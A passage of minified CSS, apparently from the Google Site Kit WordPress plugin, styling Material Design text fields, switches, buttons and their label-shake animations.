.mdc-text-field__icon~.mdc-text-field__icon[dir=rtl]{right:auto;left:12px}.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__input{padding-left:44px;padding-right:44px}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__input,.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__input[dir=rtl]{padding-left:44px;padding-right:44px}.mdc-text-field--dense .mdc-floating-label--float-above{transform:translateY(-70%) scale(0.8)}.mdc-text-field--dense .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-dense 250ms 1}.mdc-text-field--dense .mdc-text-field__input{padding:12px 12px 0}.mdc-text-field--dense .mdc-floating-label{font-size:.813rem}.mdc-text-field--dense .mdc-floating-label--float-above{font-size:.813rem}.mdc-text-field__input:required~.mdc-floating-label::after,.mdc-text-field__input:required~.mdc-notched-outline .mdc-floating-label::after{margin-left:1px;content:"*"}.mdc-text-field--textarea{display:inline-flex;width:auto;height:auto;transition:none;overflow:visible}.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.mdc-text-field--textarea:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.38)}.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-text-field--textarea:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.87)}.mdc-text-field--textarea:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__leading,.mdc-text-field--textarea:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__notch,.mdc-text-field--textarea:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__trailing{border-color:#3c7251;border-color:var(--mdc-theme-primary, #3c7251)}.mdc-text-field--textarea .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-outlined 250ms 1}.mdc-text-field--textarea .mdc-notched-outline .mdc-notched-outline__leading{border-radius:4px 0 0 4px}[dir=rtl] .mdc-text-field--textarea .mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--textarea .mdc-notched-outline .mdc-notched-outline__leading[dir=rtl]{border-radius:0 4px 4px 0}.mdc-text-field--textarea .mdc-notched-outline .mdc-notched-outline__trailing{border-radius:0 4px 4px 0}[dir=rtl] .mdc-text-field--textarea .mdc-notched-outline .mdc-notched-outline__trailing,.mdc-text-field--textarea .mdc-notched-outline .mdc-notched-outline__trailing[dir=rtl]{border-radius:4px 0 0 4px}.mdc-text-field--textarea::before,.mdc-text-field--textarea::after{content:none}.mdc-text-field--textarea:not(.mdc-text-field--disabled){background-color:transparent}.mdc-text-field--textarea .mdc-floating-label--float-above{transform:translateY(-144%) scale(1)}.mdc-text-field--textarea .mdc-floating-label--float-above{font-size:.75rem}.mdc-text-field--textarea.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--textarea .mdc-notched-outline--upgraded .mdc-floating-label--float-above{transform:translateY(-130%) scale(0.75)}.mdc-text-field--textarea.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--textarea .mdc-notched-outline--upgraded .mdc-floating-label--float-above{font-size:1rem}.mdc-text-field--textarea .mdc-text-field-character-counter{left:initial;right:16px;position:absolute;bottom:13px}[dir=rtl] .mdc-text-field--textarea .mdc-text-field-character-counter,.mdc-text-field--textarea .mdc-text-field-character-counter[dir=rtl]{left:16px;right:initial}.mdc-text-field--textarea .mdc-text-field__input{align-self:auto;box-sizing:border-box;height:auto;margin:8px 1px 1px 0;padding:0 16px 16px;border:none}.mdc-text-field--textarea .mdc-text-field-character-counter+.mdc-text-field__input{margin-bottom:28px;padding-bottom:0}.mdc-text-field--textarea .mdc-floating-label{top:17px;bottom:auto;width:auto;pointer-events:none}.mdc-text-field--textarea.mdc-text-field--focused .mdc-notched-outline__leading,.mdc-text-field--textarea.mdc-text-field--focused .mdc-notched-outline__notch,.mdc-text-field--textarea.mdc-text-field--focused .mdc-notched-outline__trailing{border-width:2px}.mdc-text-field--fullwidth{width:100%}.mdc-text-field--fullwidth:not(.mdc-text-field--textarea){display:block}.mdc-text-field--fullwidth:not(.mdc-text-field--textarea)::before,.mdc-text-field--fullwidth:not(.mdc-text-field--textarea)::after{content:none}.mdc-text-field--fullwidth:not(.mdc-text-field--textarea):not(.mdc-text-field--disabled){background-color:transparent}.mdc-text-field--fullwidth:not(.mdc-text-field--textarea) .mdc-text-field__input{padding:0}.mdc-text-field--fullwidth.mdc-text-field--textarea .mdc-text-field__input{resize:vertical}.mdc-text-field--fullwidth.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--textarea){border-bottom-color:#ac4220}.mdc-text-field-helper-line{display:flex;justify-content:space-between;box-sizing:border-box}.mdc-text-field--dense+.mdc-text-field-helper-line{margin-bottom:4px}.mdc-text-field+.mdc-text-field-helper-line{padding-right:16px;padding-left:16px}.mdc-form-field>.mdc-text-field+label{align-self:flex-start}.mdc-text-field--focused:not(.mdc-text-field--disabled) .mdc-floating-label{color:rgba(60,114,81,.87)}.mdc-text-field--focused .mdc-text-field__input:required~.mdc-floating-label::after,.mdc-text-field--focused .mdc-text-field__input:required~.mdc-notched-outline .mdc-floating-label::after{color:rgba(60,114,81,.87)}.mdc-text-field--focused+.mdc-text-field-helper-line .mdc-text-field-helper-text:not(.mdc-text-field-helper-text--validation-msg){opacity:1}.mdc-text-field--textarea.mdc-text-field--focused:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.mdc-text-field--textarea.mdc-text-field--focused:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.mdc-text-field--textarea.mdc-text-field--focused:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:#3c7251;border-color:var(--mdc-theme-primary, #3c7251)}.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--outlined):not(.mdc-text-field--textarea) .mdc-text-field__input{border-bottom-color:#ac4220}.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--outlined):not(.mdc-text-field--textarea) .mdc-text-field__input:hover{border-bottom-color:#ac4220}.mdc-text-field--invalid:not(.mdc-text-field--disabled) .mdc-line-ripple{background-color:#ac4220}.mdc-text-field--invalid:not(.mdc-text-field--disabled) .mdc-floating-label{color:#ac4220}.mdc-text-field--invalid:not(.mdc-text-field--disabled).mdc-text-field--invalid+.mdc-text-field-helper-line .mdc-text-field-helper-text--validation-msg{color:#ac4220}.mdc-text-field--invalid .mdc-text-field__input{caret-color:#ac4220}.mdc-text-field--invalid .mdc-text-field__input:required~.mdc-floating-label::after,.mdc-text-field--invalid .mdc-text-field__input:required~.mdc-notched-outline .mdc-floating-label::after{color:#ac4220}.mdc-text-field--invalid.mdc-text-field--with-trailing-icon:not(.mdc-text-field--with-leading-icon):not(.mdc-text-field--disabled) .mdc-text-field__icon{color:#ac4220}.mdc-text-field--invalid.mdc-text-field--with-trailing-icon.mdc-text-field--with-leading-icon:not(.mdc-text-field--disabled) .mdc-text-field__icon~.mdc-text-field__icon{color:#ac4220}.mdc-text-field--invalid+.mdc-text-field-helper-line .mdc-text-field-helper-text--validation-msg{opacity:1}.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:#ac4220}.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:#ac4220}.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__leading,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__notch,.mdc-text-field--textarea.mdc-text-field--invalid:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__trailing{border-color:#ac4220}.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:#ac4220}.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:#ac4220}.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__leading,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__notch,.mdc-text-field--outlined.mdc-text-field--invalid:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__trailing{border-color:#ac4220}.mdc-text-field--disabled{background-color:#fafafa;border-bottom:none;pointer-events:none}.mdc-text-field--disabled .mdc-text-field__input{border-bottom-color:rgba(0,0,0,.06)}.mdc-text-field--disabled .mdc-text-field__input{color:rgba(0,0,0,.37)}.mdc-text-field--disabled .mdc-floating-label{color:rgba(0,0,0,.37)}.mdc-text-field--disabled+.mdc-text-field-helper-line .mdc-text-field-helper-text{color:rgba(0,0,0,.37)}.mdc-text-field--disabled .mdc-text-field-character-counter,.mdc-text-field--disabled+.mdc-text-field-helper-line .mdc-text-field-character-counter{color:rgba(0,0,0,.37)}.mdc-text-field--disabled .mdc-text-field__icon{color:rgba(0,0,0,.3)}.mdc-text-field--disabled:not(.mdc-text-field--textarea){border-bottom-color:rgba(0,0,0,.12)}.mdc-text-field--disabled .mdc-floating-label{cursor:default}.mdc-text-field--textarea.mdc-text-field--disabled{background-color:transparent;background-color:#f9f9f9}.mdc-text-field--textarea.mdc-text-field--disabled .mdc-notched-outline__leading,.mdc-text-field--textarea.mdc-text-field--disabled .mdc-notched-outline__notch,.mdc-text-field--textarea.mdc-text-field--disabled .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.06)}.mdc-text-field--textarea.mdc-text-field--disabled .mdc-text-field__input{border-bottom:none}@keyframes mdc-floating-label-shake-float-above-text-field-dense{0%{transform:translateX(calc(0 - 0%)) translateY(-70%) scale(0.8)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 0%)) translateY(-70%) scale(0.8)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 0%)) translateY(-70%) scale(0.8)}100%{transform:translateX(calc(0 - 0%)) translateY(-70%) scale(0.8)}}@keyframes mdc-floating-label-shake-float-above-text-field-outlined{0%{transform:translateX(calc(0 - 0%)) translateY(-130%) scale(0.75)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 0%)) translateY(-130%) scale(0.75)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 0%)) translateY(-130%) scale(0.75)}100%{transform:translateX(calc(0 - 0%)) translateY(-130%) scale(0.75)}}@keyframes mdc-floating-label-shake-float-above-text-field-outlined-dense{0%{transform:translateX(calc(0 - 0%)) translateY(-120%) scale(0.8)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 0%)) translateY(-120%) scale(0.8)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 0%)) translateY(-120%) scale(0.8)}100%{transform:translateX(calc(0 - 0%)) translateY(-120%) scale(0.8)}}@keyframes mdc-floating-label-shake-float-above-text-field-outlined-leading-icon{0%{transform:translateX(calc(0 - 0)) translateY(-130%) scale(0.75)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 0)) translateY(-130%) scale(0.75)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 0)) translateY(-130%) scale(0.75)}100%{transform:translateX(calc(0 - 0)) translateY(-130%) scale(0.75)}}@keyframes mdc-floating-label-shake-float-above-text-field-outlined-leading-icon-dense{0%{transform:translateX(calc(0 - 21px)) translateY(-120%) scale(0.8)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 21px)) translateY(-120%) scale(0.8)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 21px)) translateY(-120%) scale(0.8)}100%{transform:translateX(calc(0 - 21px)) translateY(-120%) scale(0.8)}}@keyframes mdc-floating-label-shake-float-above-text-field-outlined-leading-icon-rtl{0%{transform:translateX(calc(0 - 0)) translateY(-130%) scale(0.75)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 0)) translateY(-130%) scale(0.75)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 0)) translateY(-130%) scale(0.75)}100%{transform:translateX(calc(0 - 0)) translateY(-130%) scale(0.75)}}@keyframes mdc-floating-label-shake-float-above-text-field-outlined-leading-icon-dense-rtl{0%{transform:translateX(calc(0 - -21px)) translateY(-120%) scale(0.8)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - -21px)) translateY(-120%) scale(0.8)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - -21px)) translateY(-120%) scale(0.8)}100%{transform:translateX(calc(0 - -21px)) translateY(-120%) scale(0.8)}}@keyframes mdc-floating-label-shake-float-above-textarea{0%{transform:translateX(calc(0 - 0%)) translateY(-130%) scale(0.75)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 0%)) translateY(-130%) scale(0.75)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 0%)) translateY(-130%) scale(0.75)}100%{transform:translateX(calc(0 - 0%)) translateY(-130%) scale(0.75)}}.mdc-switch{display:inline-block;position:relative;outline:none;-webkit-user-select:none;user-select:none}.mdc-switch.mdc-switch--checked .mdc-switch__track{background-color:#446199;background-color:var(--mdc-theme-secondary, #446199);border-color:#446199;border-color:var(--mdc-theme-secondary, #446199)}.mdc-switch.mdc-switch--checked .mdc-switch__thumb{background-color:#446199;background-color:var(--mdc-theme-secondary, #446199);border-color:#446199;border-color:var(--mdc-theme-secondary, #446199)}.mdc-switch:not(.mdc-switch--checked) .mdc-switch__track{background-color:#000;border-color:#000}.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb{background-color:#fff;border-color:#fff}.mdc-switch__native-control{left:0;right:initial;position:absolute;top:0;width:68px;height:48px;margin:0;opacity:0;cursor:pointer;pointer-events:auto}[dir=rtl] .mdc-switch__native-control,.mdc-switch__native-control[dir=rtl]{left:initial;right:0}.mdc-switch__track{box-sizing:border-box;width:32px;height:14px;border:1px solid;border-radius:7px;opacity:.38;transition:opacity 90ms cubic-bezier(0.4, 0, 0.2, 1),background-color 90ms cubic-bezier(0.4, 0, 0.2, 1),border-color 90ms cubic-bezier(0.4, 0, 0.2, 1)}.mdc-switch__thumb-underlay{left:-18px;right:initial;display:flex;position:absolute;top:-17px;align-items:center;justify-content:center;width:48px;height:48px;transform:translateX(0);transition:transform 90ms cubic-bezier(0.4, 0, 0.2, 1),background-color 90ms cubic-bezier(0.4, 0, 0.2, 1),border-color 90ms cubic-bezier(0.4, 0, 0.2, 1)}[dir=rtl] .mdc-switch__thumb-underlay,.mdc-switch__thumb-underlay[dir=rtl]{left:initial;right:-18px}.mdc-switch__thumb{box-shadow:0px 3px 1px -2px rgba(0, 0, 0, 0.2),0px 2px 2px 0px rgba(0, 0, 0, 0.14),0px 1px 5px 0px rgba(0,0,0,.12);box-sizing:border-box;width:20px;height:20px;border:10px solid;border-radius:50%;pointer-events:none;z-index:1}.mdc-switch--checked .mdc-switch__track{opacity:.54}.mdc-switch--checked .mdc-switch__thumb-underlay{transform:translateX(20px)}[dir=rtl] .mdc-switch--checked .mdc-switch__thumb-underlay,.mdc-switch--checked .mdc-switch__thumb-underlay[dir=rtl]{transform:translateX(-20px)}.mdc-switch--checked .mdc-switch__native-control{transform:translateX(-20px)}[dir=rtl] .mdc-switch--checked .mdc-switch__native-control,.mdc-switch--checked .mdc-switch__native-control[dir=rtl]{transform:translateX(20px)}.mdc-switch--disabled{opacity:.38;pointer-events:none}.mdc-switch--disabled .mdc-switch__thumb{border-width:1px}.mdc-switch--disabled .mdc-switch__native-control{cursor:default;pointer-events:none}.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb-underlay::before,.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb-underlay::after{background-color:#9e9e9e}.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb-underlay:hover::before{opacity:.08}.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded):focus::before,.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb-underlay.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb-underlay.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.mdc-switch__thumb-underlay{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mdc-switch__thumb-underlay::before,.mdc-switch__thumb-underlay::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-switch__thumb-underlay::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-switch__thumb-underlay.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-switch__thumb-underlay.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-switch__thumb-underlay.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-switch__thumb-underlay.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-switch__thumb-underlay.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-switch__thumb-underlay::before,.mdc-switch__thumb-underlay::after{top:calc(50% - 50%);left:calc(50% - 50%);width:100%;height:100%}.mdc-switch__thumb-underlay.mdc-ripple-upgraded::before,.mdc-switch__thumb-underlay.mdc-ripple-upgraded::after{top:var(--mdc-ripple-top, calc(50% - 50%));left:var(--mdc-ripple-left, calc(50% - 50%));width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-switch__thumb-underlay.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-switch__thumb-underlay::before,.mdc-switch__thumb-underlay::after{background-color:#446199}@supports not (-ms-ime-align: auto){.mdc-switch__thumb-underlay::before,.mdc-switch__thumb-underlay::after{background-color:var(--mdc-theme-secondary, #446199)}}.mdc-switch__thumb-underlay:hover::before{opacity:.04}.mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded):focus::before,.mdc-switch__thumb-underlay.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-switch__thumb-underlay.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-button{box-shadow:none;font-weight:500;text-transform:none}.googlesitekit-plugin .mdc-button:not(:disabled){color:#3c7251}@media(max-width: 960px){.googlesitekit-plugin .mdc-button{min-width:auto}}.googlesitekit-plugin .mdc-button .mdc-button__icon--image{border-radius:50%;display:block;height:18px;width:18px}.googlesitekit-plugin .mdc-button .mdc-button__trailing-icon{margin-left:8px}.googlesitekit-plugin .mdc-button--raised{border-radius:100px;box-shadow:none;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:40px;padding-bottom:8px;padding-top:8px;text-align:center}.googlesitekit-plugin .mdc-button--raised:not(:disabled){background-color:#3c7251}.googlesitekit-plugin .mdc-button--raised:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--raised::before,.googlesitekit-plugin .mdc-button--raised::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--raised::before,.googlesitekit-plugin .mdc-button--raised::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--raised:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--raised.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--raised.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--raised.mdc-button--dense{border-radius:100px}.googlesitekit-plugin .mdc-button--raised:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--raised:focus{outline:none}.googlesitekit-plugin .mdc-button--danger:not(:disabled){background-color:#ac4220}.googlesitekit-plugin .mdc-button--danger:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--danger::before,.googlesitekit-plugin .mdc-button--danger::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--danger::before,.googlesitekit-plugin .mdc-button--danger::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--danger:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--danger.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--danger.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--dropdown{background-image:url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2212%22%20height%3D%228%22%20viewBox%3D%220%200%2012%208%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M10.6.6L12%202%206%208%200%202%201.4.6%206%205.2z%22%20fill%3D%22%23757575%22%20fill-rule%3D%22evenodd%22%2F%3E%3C%2Fsvg%3E");background-position:calc(100% - 8px) center;background-repeat:no-repeat;background-size:9px 6px;letter-spacing:normal;padding-right:12px;text-transform:none}.googlesitekit-plugin .mdc-button--dropdown:not(:disabled){color:#161b18}@media(min-width: 600px){.googlesitekit-plugin .mdc-button--dropdown{padding-right:25px}}.googlesitekit-plugin .mdc-button--dropdown:hover,.googlesitekit-plugin .mdc-button--dropdown:active,.googlesitekit-plugin .mdc-button--dropdown:focus{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--dropdown:hover:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:active:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:focus:not(:disabled){background-color:#ebeef0}.googlesitekit-plugin .mdc-button--dropdown:hover:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:active:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--dropdown:hover::before,.googlesitekit-plugin .mdc-button--dropdown:hover::after,.googlesitekit-plugin .mdc-button--dropdown:active::before,.googlesitekit-plugin .mdc-button--dropdown:active::after,.googlesitekit-plugin .mdc-button--dropdown:focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--dropdown:hover::before,.googlesitekit-plugin .mdc-button--dropdown:hover::after,.googlesitekit-plugin .mdc-button--dropdown:active::before,.googlesitekit-plugin .mdc-button--dropdown:active::after,.googlesitekit-plugin .mdc-button--dropdown:focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--dropdown:hover:hover::before,.googlesitekit-plugin .mdc-button--dropdown:active:hover::before,.googlesitekit-plugin .mdc-button--dropdown:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:hover.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--dropdown:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin 